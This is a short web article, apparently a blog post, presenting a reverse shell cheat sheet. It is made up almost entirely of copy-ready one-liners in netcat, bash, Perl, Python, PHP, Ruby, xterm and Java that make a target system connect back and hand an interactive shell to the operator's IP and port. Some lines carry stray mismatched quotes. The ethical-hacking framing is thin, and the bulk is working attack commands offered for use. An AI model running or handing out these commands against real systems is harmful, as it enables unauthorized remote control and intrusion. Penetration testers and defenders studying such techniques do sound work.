What is Reverse Shell? Reverse Shell Cheat Sheet

Introduction:

We’re going to take a look at reverse shells today and use a simple cheat sheet to help you understand their nuances. Whatever your level of technical expertise, the goal of this guide is to streamline the procedure and make reverse shells useful and approachable. Let’s get straight to the point and avoid superfluous complications.

 

Understanding Reverse Shell:

Let’s make sure we grasp reverse shells thoroughly before we examine the cheat sheet. Imagine, essentially, a stealthy way to take remote control of a system; this would be an invaluable resource for system management, troubleshooting, and ethical hacking projects.

 

The Revealed Cheat Sheet:

1. Netcat:

 

• • Establish a listening connection on your machine:

     nc -l -p <your_port>

  • Instruct the target system to connect back to you:

    nc <your_ip> <your_port>

 

Bonus Tip: Should Netcat present challenges, consider the alternative:

• • rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <your_ip> <your_port> >/tmp/f

 

2. Bash:

• • Instruct the target system to connect back to you:

    bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1

 

3. Perl:

• • Short version for the target system:

'perl -e 'use Socket;$i="<your_ip>";$p=<your_port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 

4. Python:

• • For Python 2 on the target system:

'python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

5. PHP:

• • For the target system assuming FD 3:

'php -r '$sock=fsockopen("<your_ip>",<your_port>);exec("/bin/sh -i <&3 >&3 2>&3");'

 

6. Ruby:

• • For the target system:

'ruby -rsocket -e'f=TCPSocket.open("<your_ip>",<your_port>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

 

7. Netcat:

• • If netcat is present on the target system:

nc -e /bin/sh <your_ip> <your_port>

 

8. Xterm:

• On your server, initiate the command:

  xterm -display <your_ip>:1

• On your system, open an X-Server with

  Xnest :1

• Authorize the target system to connect with:

  xhost +targetip

 

9. Java:

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()

 

Making Sense of the Cheat Sheet:

Feeling a bit overwhelmed? Fear not. Let’s make things easier:

 

Select Your Instrument:

Choose the approach that works best for the target system and your preferences.

 

Prepare for Connection:

Open a listening connection on your machine using netcat or a preferred tool.

 

Give the Connection Instructions:

To reconnect to your computer, run the reverse shell command on the target system.

 

Customize Your Commands:

Adjust the commands according to the particular shell environment, your IP address, and your preferred ports.

 

 

Conclusion:

Here you have it: a succinct and useful reverse shell cheat sheet. Whether you’re ethical hacking or troubleshooting, make sure to use your newly acquired skills appropriately. Not superfluous jargon, just useful tech tips. Happy hacking!